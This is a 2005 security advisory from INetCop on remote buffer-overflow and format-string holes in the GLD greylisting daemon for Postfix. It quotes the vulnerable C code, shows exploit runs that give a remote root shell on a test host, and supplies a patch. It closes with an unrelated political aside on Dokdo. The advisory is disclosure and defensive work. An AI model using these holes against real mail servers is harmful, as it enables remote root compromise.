========================================
INetCop Security Advisory #2005-0x82-026
========================================
Title: GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
0x01. Description
About:
Gld is a standalone greylisting server for Postfix.
Greylisting is a new weapon to use against spam. For more information on
this technique, see http://www.greylisting.org.
This implementation listens on a TCP port and uses MySQL for storing data.
The server supports whitelists based on sender, sender domain and client IP.
It also supports light greylisting.
URL: http://www.gasmi.net/gld.html
Reference URL: http://www.gasmi.net/down/gld-readme
It's using in FreeBSD port and gentoo, debian.
Reference URL: http://wyae.de/docs/greylisting_on_debian.php
Reference URL: http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/gld/
Reference URL: http://gentoo-portage.com/mail-filter/gld
Reference URL: http://directory.fsf.org/email/spam/gld.html
The program has plenty of remote vulnerabilities.
These vulnerabilities can be used remote user to gain root privilege.
#1) Multi-oveflow vulnerability
This problem happens because of abuse of strcpy() and sprintf() functions
`/gid-1.4/server.c':
--
...
195 int HandleChild(int s,config *cnf)
196 {
197 char buff[BLEN];
198 char request[BLEN];
199 char sender[BLEN];
200 char recipient[BLEN];
201 char ip[BLEN];
...
301 if(strcmp(request,REQ)!=0 || recipient[0]==0 || ip[0]==0)
302 {
303 sprintf(buff,"Received invalid data req=(%s) sender=(%s)
recipient=(%s) ip=(%s)",request,sender,recipient,ip); // here
304 if(cnf->syslog==1) ErrorLog(cnf,buff);
305 if(cnf->debug==1) printf("%d: %s\n",pid,buff);
306 return(-2);
307 }
...
--
Remote overflow exploit can be happened by sprintf() and it allows attacker to
gain root privilege.
#2) remote format string -
These vulnerabilities are very easy to be exploited.
gld.conf is supporting syslog() function basically.
Thereby, with problem in next code, it's possible to gain root privilege.
`/gld-1.4/cnf.c':
--
...
117 void ErrorLog(config *conf,char *msg)
118 {
119 #ifdef HAVE_SYSLOG_H
120 openlog("gld",0,conf->facility);
121 syslog(LOG_ALERT,msg); // here
122 closelog();
123 #endif
124 }
...
--
It happens by illegal use of syslog() function.
--
bash-2.04# cat *.c |grep ErrorLog |grep -v void
if(conf.syslog==1) ErrorLog(&conf,"gld started, up and running");
if(cid < 0 && conf.syslog==1) ErrorLog(&conf,"Fork returned
error code, no child");
ErrorLog(cnf,buff);
if(cnf->syslog==1) ErrorLog(cnf,"Read Network error");
if(cnf->syslog==1) ErrorLog(cnf,buff);
if(cnf->syslog==1) ErrorLog(cnf,"MySQL error");
bash-2.04#
--
It can be exploited pretty easily.
And there are alot more sprintf(), strcpy() function overflow vulnerabilities
which are not mentioned.
0x02. Vulnerable Packages
Vendor site: http://www.gasmi.net/gld.html
GLD all version (exploitable)
-gld-1.4.tgz
-gld.1.3.tgz
0x03. Exploit
I made this exploit in RedHat Linux 7.x and 9.x by Proof of Concept code.
There is no plan to develop other platform code.
#1) remote buffer overflow exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 3 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)
# method: jmp *%esp exploit: 254 byte
# send code size: 2200 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash: no job control in this shell
stty: standard input: Invalid argument
[root@x0x /]# w
#2) remote format string exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 0 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)
# Make format string, .dtors: 0x804d14c
#
# shellcode addr: 0x805506e, size: 320 byte
# send code size: 394 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash: no job control in this shell
stty: standard input: Invalid argument
[root@x0x /]#
0x04. Patch
GLD 1.4 patch:
=== gld-1.4.patch ===
--- cnf.c 2004-08-18 23:44:22.000000000 +0900
+++ patch/cnf.c 2005-03-06 17:36:04.000000000 +0900
@@ -118,7 +118,7 @@
{
#ifdef HAVE_SYSLOG_H
openlog("gld",0,conf->facility);
-syslog(LOG_ALERT,msg);
+syslog(LOG_ALERT,"%s",msg);
closelog();
#endif
}
--- greylist.c 2004-08-18 04:12:38.000000000 +0900
+++ patch/greylist.c 2005-03-06 17:39:59.000000000 +0900
@@ -20,9 +20,9 @@
pid=getpid();
ts=time(0);
-strcpy(oip,ip);
-strcpy(osender,sender);
-strcpy(orecipient,recipient);
+strncpy(oip,ip,sizeof(oip)-1);
+strncpy(osender,sender,sizeof(osender)-1);
+strncpy(orecipient,recipient,sizeof(orecipient)-1);
if(conf->debug==1) printf("%d: Starting the greylist algo\n",pid);
@@ -52,17 +52,17 @@
if(conf->debug==1) printf("%d: lightgrey on domain is on, let's keep
the domain only on recipient and sender\n",pid);
domain=(char *)strstr(osender,"@");
- if(domain!=NULL) strcpy(sender,domain);
+ if(domain!=NULL) strncpy(sender,domain,BLEN-1);
domain=(char *)strstr(orecipient,"@");
- if(domain!=NULL) strcpy(recipient,domain);
+ if(domain!=NULL) strncpy(recipient,domain,BLEN-1);
}
//
// Do we have this entry in our database ?
//
-sprintf(query,"select first from greylist where ip='%s' and sender='%s' and
recipient='%s'",ip,sender,recipient);
+snprintf(query,sizeof(query)-1,"select first from greylist where ip='%s' and
sender='%s' and recipient='%s'",ip,sender,recipient);
n=SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s) result=%ld\n",pid,query,n);
@@ -78,7 +78,7 @@
//
if(conf->lightd==1 && n==0)
{
- sprintf(query,"select first from greylist where ip='%s' and
sender='%s' and recipient='%s'",ip,osender,orecipient);
+ snprintf(query,sizeof(query)-1,"select first from greylist where
ip='%s' and sender='%s' and recipient='%s'",ip,osender,orecipient);
n=SQLQuery(query);
if(n<0) return(-1);
if(n==0) fneither=1; else fnotdomain=1;
@@ -101,7 +101,7 @@
domain=(char *)strstr(osender,"@");
if(domain==NULL) domain=osender;
- strcpy(netw,oip);
+ strncpy(netw,oip,sizeof(netw)-1);
l=strlen(netw);
for(i=l-1;i>=0;i--)
if(netw[i]=='.')
@@ -111,7 +111,7 @@
}
- sprintf(query,"select count(mail) from whitelist where mail in
('%s','%s','%s','%s')",osender,domain,oip,netw);
+ snprintf(query,sizeof(query)-1,"select count(mail) from whitelist
where mail in ('%s','%s','%s','%s')",osender,domain,oip,netw);
n=SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s) result=%ld\n",pid,query,n);
if(n>0)
@@ -130,7 +130,7 @@
x=sscanf(oip,"%d.%d.%d.%d",&a,&b,&c,&d);
if(x==4)
{
- sprintf(query,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
+
snprintf(query,sizeof(query)-1,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
n=DnsIp(query,NULL);
if(conf->debug==1) printf("%d: DNSQuery=(%s)
result=%ld\n",pid,query,n);
if(n==0)
@@ -146,9 +146,9 @@
// was not whitelisted and thus we have to insert it
//
if(conf->lightd==1 && fneither==1)
- sprintf(query,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,osender,orecipient,ts,ts);
+ snprintf(query,sizeof(query)-1,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,osender,orecipient,ts,ts);
- else sprintf(query,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
+ else snprintf(query,sizeof(query)-1,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s)\n",pid,query);
@@ -165,9 +165,9 @@
if(conf->update==1)
{
if(conf->lightd==1 && fnotdomain==1)
- sprintf(query,"update greylist set last=%d,n=n+1 where
ip='%s' and sender='%s' and recipient='%s'",ts,ip,osender,orecipient);
+ snprintf(query,sizeof(query)-1,"update greylist set
last=%d,n=n+1 where ip='%s' and sender='%s' and
recipient='%s'",ts,ip,osender,orecipient);
- else sprintf(query,"update greylist set last=%d,n=n+1 where
ip='%s' and sender='%s' and recipient='%s'",ts,ip,sender,recipient);
+ else snprintf(query,sizeof(query)-1,"update greylist set
last=%d,n=n+1 where ip='%s' and sender='%s' and
recipient='%s'",ts,ip,sender,recipient);
SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s)\n",pid,query);
@@ -180,7 +180,7 @@
if(ts-n>conf->mini && conf->lightd==1 && fnotdomain==1)
{
- sprintf(query,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
+ snprintf(query,sizeof(query)-1,"insert into greylist
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
if(conf->debug==1) printf("Add the domain triplet for next
time.\n");
SQLQuery(query);
}
--- server.c 2004-08-19 07:57:03.000000000 +0900
+++ patch/server.c 2005-03-06 17:41:52.000000000 +0900
@@ -215,7 +215,7 @@
if(cnf->debug==1) printf("%d: Rejected New incoming connexion from %s
(%s)\n",pid,buff,ip);
if(cnf->syslog==1)
{
- sprintf(buff,"Rejected New incoming connexion from %s
(%s)\n",buff,ip);
+ snprintf(buff,sizeof(buff)-1,"Rejected New incoming connexion
from %s (%s)\n",buff,ip);
ErrorLog(cnf,buff);
}
@@ -262,16 +262,16 @@
if(strcmp(buff,"")==0) break;
if(strncmp(buff,"request=",8)==0)
- strcpy(request,buff+8);
+ strncpy(request,buff+8,sizeof(request)-1);
if(strncmp(buff,"sender=",7)==0)
- strcpy(sender,buff+7);
+ strncpy(sender,buff+7,sizeof(sender)-1);
if(strncmp(buff,"recipient=",10)==0)
- strcpy(recipient,buff+10);
+ strncpy(recipient,buff+10,sizeof(recipient)-1);
if(strncmp(buff,"client_address=",15)==0)
- strcpy(ip,buff+15);
+ strncpy(ip,buff+15,sizeof(ip)-1);
}
@@ -300,7 +300,7 @@
if(strcmp(request,REQ)!=0 || recipient[0]==0 || ip[0]==0)
{
- sprintf(buff,"Received invalid data req=(%s) sender=(%s) recipient=(%s)
ip=(%s)",request,sender,recipient,ip);
+ snprintf(buff,sizeof(buff)-1,"Received invalid data req=(%s)
sender=(%s) recipient=(%s) ip=(%s)",request,sender,recipient,ip);
if(cnf->syslog==1) ErrorLog(cnf,buff);
if(cnf->debug==1) printf("%d: %s\n",pid,buff);
return(-2);
@@ -322,7 +322,7 @@
if(n==0)
{
- sprintf(buff,"action=defer_if_permit %s\n\n",cnf->message);
+ snprintf(buff,sizeof(buff)-1,"action=defer_if_permit
%s\n\n",cnf->message);
WriteSocket(s,buff,strlen(buff),TOUT);
if(cnf->syslog==1) Log(cnf,recipient,sender,ip,MSGGREYLIST);
if(cnf->debug==1) printf("%d: Decision is to greylist\n",pid);
=== eof ===
P.S: Sorry, for my poor english.
--
These days, the main issue that strikes Korea is small rocky island "Dokdo".
You can get more detailed information from following websites.
"Japanese goverment has to follow and learn from German goverment"
I can confidently say "Dokdo is belong to Korea".
(1) reference
1) Their claim that the East Sea has some historical precedent worked,
as some major book and map publishers, educational web sites and other
reference materials now include the East Sea name along with the Sea of Japan.
- worldatlas.com-
http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm
2) On historical perspective and in international law, why there
is no valid dispute over the ownership of Dokdo.
http://www.prkorea.com/english/textbook/ge03.html
3) Truth in scholarship
http://www.prkorea.com/english/textbook/maintruth.html
--
By "dong-houn yoU" (Xpl017Elz), in INetCop Security Co., LTD.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.net
My World: http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--
--
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
Attachment:
0x82-meOw_linuxer_forever.c
Description: Binary data